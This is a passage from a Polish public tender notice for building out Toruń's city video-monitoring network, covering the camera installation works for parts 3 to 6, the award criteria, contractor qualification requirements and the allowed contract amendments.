stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.3.1.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych związanych z uruchomieniem jednego „punktu kamerowego” w ramach zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 1 punkt kamerowy przy skrzyżowaniu ulic Łódzkiej i Włocławskiej” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.3.2.	Przedmiot zamówienia obejmuje:<br/>1)	Jeden „punkt kamerowy” przy skrzyżowaniu ulic Łódzkiej i Włocławskiej do realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”.<br/>Zakres prac:<br/>a)	montaż kamery kopułkowej, obrotowej na istniejącym maszcie wysięgnikowym - 1 szt.; <br/>b)	montaż szafki teletechnicznej typu OS26x40+KN, wraz z wyposażeniem – 1 szt.; <br/>c)	wymiana ram i pokryw studni typu B125 – 2 szt.; <br/>d)	montaż linii kablowej UTP kat 6 FTP (żelowany zewnętrzny) w istniejącej <br/>i projektowanej kanalizacji kablowej – dł. Tras 42/inst.47; <br/>e)	instalacja okablowania teletechnicznego i elektrycznego; <br/>f)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanej kamery do Centrum Monitoringu, ul. Legionów 70/76 w Toruniu;<br/>g)	roboty budowlane, polegające na budowie rurociągów kablowych oraz przyłączy energetycznych.<br/>1.3.3.	Usługi i roboty budowlane, będące przedmiotem zamówienia zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamery wraz z uchwytami i zasilaczem. <br/>1.3.4.	Wykonawca zrealizuje przedmiot zamówienia w zakresie i w sposób określony w Projekcie Budowlanym oraz Projekcie Wykonawczym, dotyczących części 3, opracowanych przez Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z marca 2024r. - posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnymi i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.4.1.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych związanych z uruchomieniem „punktu kamerowego” w ramach zadania pn. „Budowa przyłączy teletechnicznych przy rozbudowie monitoringu wizyjnego miasta Torunia dla przyszłego punktu kamerowego przy skrzyżowaniu ulic Poznańskiej oraz Kluczyki” oraz „Rozbudowa monitoringu wizyjnego miasta Torunia – 1 punkt kamerowy przy skrzyżowaniu ulic Poznańskiej oraz Andersa” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.4.2.	Przedmiot zamówienia obejmuje:<br/>1)	Budowę przyłączy teletechnicznych przy rozbudowie monitoringu wizyjnego miasta Torunia dla przyszłego „punktu kamerowego” przy skrzyżowaniu ulic Poznańskiej oraz Kluczyki – usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/>Zakres prac:<br/>a)	rozbudowa kanalizacji teletechnicznej;<br/>b)	montaż linii światłowodowej;<br/>c)	przygotowanie infrastruktury do montażu punktu kamerowego - w tym celu należy do <br/>ul. Poznańskiej/ul. Kluczyki ułożyć na odcinku od istniejącej mufy światłowodowej w studni położonej przy ul. Poznańskiej 127 do projektowanej studni przy ul. Kluczyki 3, kabel światłowodowy Z-XOTKtsdD 24J, z którego:<br/>-	włókna nr 1-4 należy połączyć za pomocą spawów z istniejącym kablem ZKSXXOTKtsdFO 32J relacji „Dom Muz-Poznańska 52” – ujęcie wody „Mała Nieszawka”;<br/>-	wybudować kanalizację kablową z rur 2x110 połączoną studniami SKR1 od studni przy <br/>ul. Poznańskiej 127 do ul. Kluczyki 3 z włączeniem do sterownika drogowej sygnalizacji świetlnej Poznańska/Kluczyki;<br/>-	posadowić szafę teletechniczną kamery RK-Kluczyki i przygotować zasilanie kamery Kam2;<br/>-	w punkcie agregacyjnym połączyć linię kamery Kam2 z projektowanym przełącznikiem poprzez istniejącą przełącznicę nr 2.<br/>d)	roboty budowlane, polegające na:<br/>-	budowie rurociągów kablowych;<br/>-	budowie szafki teletechnicznej naziemnej;<br/>-	budowie przyłączy teletechnicznych oraz przyłączy energetycznych;<br/>-	budowie studni kablowych.<br/>2)	Jeden „punkt kamerowy” przy skrzyżowaniu ulic Poznańskiej i Andersa - usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”. <br/>Zakres prac:<br/>a)	montaż kamery kopułkowej, obrotowej na słupie – 1 szt.;<br/>b)	montaż szafki wraz z wyposażeniem punktu kamerowego na słupie – 1 szt.;<br/>c)	montaż linii kablowej Z-XOTKtsd 4J w projektowanej kanalizacji kablowej – dł. Tras 9m/inst.19m/opt.20m (po wybudowaniu kanalizacji kablowej od ul. Poznańskiej 127 do <br/>ul. Kluczyki 3 wynikającej z pkt 1. Zadania). <br/>d)	budowa mufy światłowodowej typu FOSC 400A4 – 1 szt; <br/>e)	montaż linii kablowej YKY 3x2,5 mm2 w kanalizacji kablowej – dł. Tras 343 m/dł. Inst. 367 m (po wybudowaniu kanalizacji kablowej od ul. Poznańskiej 127 do ul. Kluczyki 3 wynikającej z pkt 1. Zadania);<br/>f)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanych kamer do Centrum Monitoringu przy ul. Legionów 70/76 w Toruniu;<br/>g)	roboty budowlane, polegające na: <br/>-	budowie rurociągów kablowych;<br/>-	budowie słupa z fundamentem;<br/>-	budowie przyłączy teletechnicznych oraz przyłączy energetycznych.<br/>1.4.3.	Usługi i roboty budowlane, będące przedmiotem umowy zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamery wraz z uchwytami i zasilaczem. <br/>1.4.4.	Wykonawca zrealizuje przedmiot umowy w zakresie i w sposób określony w Projektach Budowlanych oraz Projektach Wykonawczych, dotyczących części 4, opracowanych przez: <br/>- Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z kwietnia 2024r. <br/>- Tomasza Gondka prowadzącego działalność gospodarczą pod firmą ELPIKS Tomasz Gondek z lutego 2024r., posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnymi i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.5.1.	Przedmiotem zamówienia jest wykonanie usług i robót budowlanych związanych z uruchomieniem dwóch punktów kamerowych w ramach zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 2 punkty kamerowe na terenie rekreacyjnym przy ul. Gościnnej 8-10” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.5.2.	Przedmiot zamówienia obejmuje:<br/>1)	Dwa „punkty kamerowe” na terenie rekreacyjnym przy ul. Gościnnej 8-10 – usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/>Zakres prac:<br/>a)	montaż stalowych słupów 6 m – 2 szt.; <br/>b)	montaż dwóch kamer kopułkowych, obrotowych na projektowanych stalowych słupach 6 m - 2 szt.; <br/>c)	montaż szafki teletechnicznej typu OS26x40+KN, wraz z wyposażeniem – 1 szt.; <br/>d)	montaż linii kablowej Z-XOTKtsd 12J w istniejącej i projektowanej kanalizacji kablowej – dł. Tras 664/inst.735/opt. 737m; <br/>e)	instalacja okablowania teletechnicznego i elektrycznego (w tym przyłączy energetycznych); <br/>f)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanej kamery do Centrum Monitoringu, ul. Legionów 70/76 w Toruniu;<br/>g)	roboty budowlane, polegające na: <br/>-	budowie rurociągów kablowych;<br/>-	budowie dwóch słupów z fundamentami.<br/>1.5.3.	Usługi i roboty budowlane, będące przedmiotem zamówienia zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamer wraz z uchwytami i zasilaczami. <br/>1.5.4.	Wykonawca zrealizuje przedmiot zamówienia w zakresie i w sposób określony w Projekcie Budowlanym oraz Projekcie Wykonawczym, dotyczących części 5, opracowanych przez Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z kwietnia 2024r. - posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnym i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.6.1.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych związanych z uruchomieniem dwóch punktów kamerowych w ramach zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia – 2 punkty kamerowe na terenie rekreacyjnym przy ul. Zbożowej/ul. Ugory” – zgodnie z postanowieniami zawartymi we wzorze umowy.<br/>1.6.2.	Przedmiot zamówienia obejmuje:<br/>1)	Dwa „punkty kamerowe” na terenie rekreacyjnym przy ul. Zbożowej/ul. Ugory – usługi i roboty budowlane w ramach realizacji zadania pn. „Rozbudowa monitoringu wizyjnego miasta Torunia”<br/>Zakres prac:<br/>a)	montaż dwóch kamer kopułkowych, obrotowych na istniejących słupach oświetleniowych <br/>- 2 szt.; <br/>b)	montaż szafki teletechnicznej wraz z wyposażeniem w pomieszczeniu zaplecza magazynowego – 1 szt.; <br/>c)	montaż szafki wraz z wyposażeniem punktu kamerowego na słupie oświetleniowym – 1 szt.; <br/>d)	montaż linii kablowej UTP kat 6 FTP zewnętrzny żelowany – 31,0 m/33,0 m; <br/>e)	montaż linii kablowej Z-XOTKtsd 4J w istniejącej i projektowanej kanalizacji kablowej – dł. tras 322/inst.368/opt. 372m; <br/>f)	montaż linii kablowej YKY 3x2,5 mm 2 – dł. tras 140 m/inst. 143 m. <br/>g)	instalacja okablowania teletechnicznego i elektrycznego (w tym przyłączy energetycznych);<br/>h)	wykonanie krosowań niezbędnych do doprowadzenia sygnału z nowo montowanej kamery do Centrum Monitoringu, ul. Legionów 70/76 w Toruniu;<br/>i)	roboty budowlane, polegające na: <br/>- budowie rurociągów kablowych,<br/>- budowie studni kablowych.<br/>1.6.3.	Usługi i roboty budowlane, będące przedmiotem umowy zostaną wykonane przez Wykonawcę z materiałów, urządzeń i przy pomocy sprzętu, który dostarczy Wykonawca, z tym wyjątkiem, że Zamawiający zobowiązuje się do dostarczenia kamer wraz z uchwytami i zasilaczami. <br/>1.6.4.	Wykonawca zrealizuje przedmiot umowy w zakresie i w sposób określony w Projekcie Budowlanym oraz Projekcie Wykonawczym, dotyczących części 6, opracowanych przez Adama Kowalskiego prowadzącego działalność gospodarczą pod firmą AKO Adam Kowalski z kwietnia 2024r. - posiadanych przez Zamawiającego i udostępnionych Wykonawcy oraz zgodnie z posiadanymi przez Zamawiającego decyzjami administracyjnymi i uzgodnieniami.<br/>2. Szczegółowy opis przedmiotu zamówienia oraz wymagania stawiane Wykonawcy zawarte są w Załączniku Nr 6 do SWZ (dokumentacje projektowe dla wszystkich części) oraz w Załączniku Nr 5 do SWZ (wzory umów dla wszystkich części). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232332-8 - Telekomunikacyjne roboty dodatkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji - minimum 36 miesięcy, maksymalnie 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy, Zamawiający określa warunek/warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia szczegółowego warunku w tym zakresie; <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – nie dotyczy;<br/>3)	sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej - Wykonawca spełni warunek jeżeli wykaże, że w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie usługi polegające na instalacji monitoringu wizyjnego o wartości każdej usługi minimum: <br/>Część 1: 35 000,00 zł brutto;<br/>Część 2: 25 000,00 zł brutto;<br/>Część 3: 15 000,00 zł brutto;<br/>Część 4: 105 000,00 zł brutto;<br/>Część 5: 35 000,00 zł brutto;<br/>Część 6: 35 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania, wskazanych w art. 108 ust. 1 ustawy - Załącznik Nr 3 do SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie, podmiotowe środki dowodowe składa każdy z Wykonawców odrębnie. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy przedstawienia podmiotowych środków dowodowych<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - wypełniony Załącznik Nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>2. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile dotyczy).<br/>3. Zastrzeżenie tajemnicy przedsiębiorstwa (o ile dotyczy).<br/>4. Wykaz rozwiązań równoważnych (o ile dotyczy).<br/>5. Zobowiązanie podmiotu trzeciego (o ile dotyczy).<br/>6. Formularz ofertowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia lub podmiotów udostępniających swoje zasoby oświadczenie, o którym mowa w pkt 14.1.b) SWZ składają odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu (dotyczy także spółki cywilnej).<br/>3. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z Zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Stron umowy.<br/>2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3. Dopuszczalne jest dokonanie zmian umowy:<br/>1) w zakresie przedmiotu umowy, terminu realizacji zamówienia i wysokości wynagrodzenia, jeżeli zmiana umowy będzie korzystna dla Zamawiającego i dotyczyć będzie:<br/>a) zmiany technologii wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej,<br/>b) zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów przewidzianych w dokumentacji projektowej,<br/>c) możliwości powierzenia wykonania części robót podwykonawcy robót, których zakres nie został wskazany w ofercie przez Wykonawcę jako przeznaczony do wykonania przez podwykonawców;<br/>2) w zakresie przedmiotu umowy, terminu realizacji zamówienia i wysokości wynagrodzenia, jeżeli zmiana umowy dotyczyć będzie materiałów, urządzeń, rozwiązań lub technologii wskazanych w opisie przedmiotu umowy, w tym w dokumentacji projektowej i polegać będzie na zastąpieniu ich materiałami, urządzeniami, rozwiązaniami lub technologiami równoważnymi w przypadku zaistnienia okoliczności uniemożliwiających, znacznie utrudniających lub oczywiście świadczących o niecelowości nieracjonalności pozyskania materiałów, urządzeń, rozwiązań lub technologii wskazanych w opisie przedmiotu umowy w tym w dokumentacji projektowej, w szczególności takich jak zaprzestanie produkcji, zaprzestanie importu, wykrycie wad istotnych;<br/>3) jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu zamówienia, która spowodowana będzie:<br/>a) wystąpieniem warunków atmosferycznych, geologicznych, archeologicznych, terenowych, w szczególności:<br/>- klęsk żywiołowych,<br/>- warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 0 ºC, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (w tym oberwanie chmury), śniegu, gradobicie, burze z wyładowaniami atmosferycznymi,<br/>- warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń zgodnie z technologią przewidzianą przez producentów,<br/>- niewypałów i niewybuchów,<br/>- wykopalisk archeologicznych,<br/>- odmiennych od przyjętych w dokumentacji 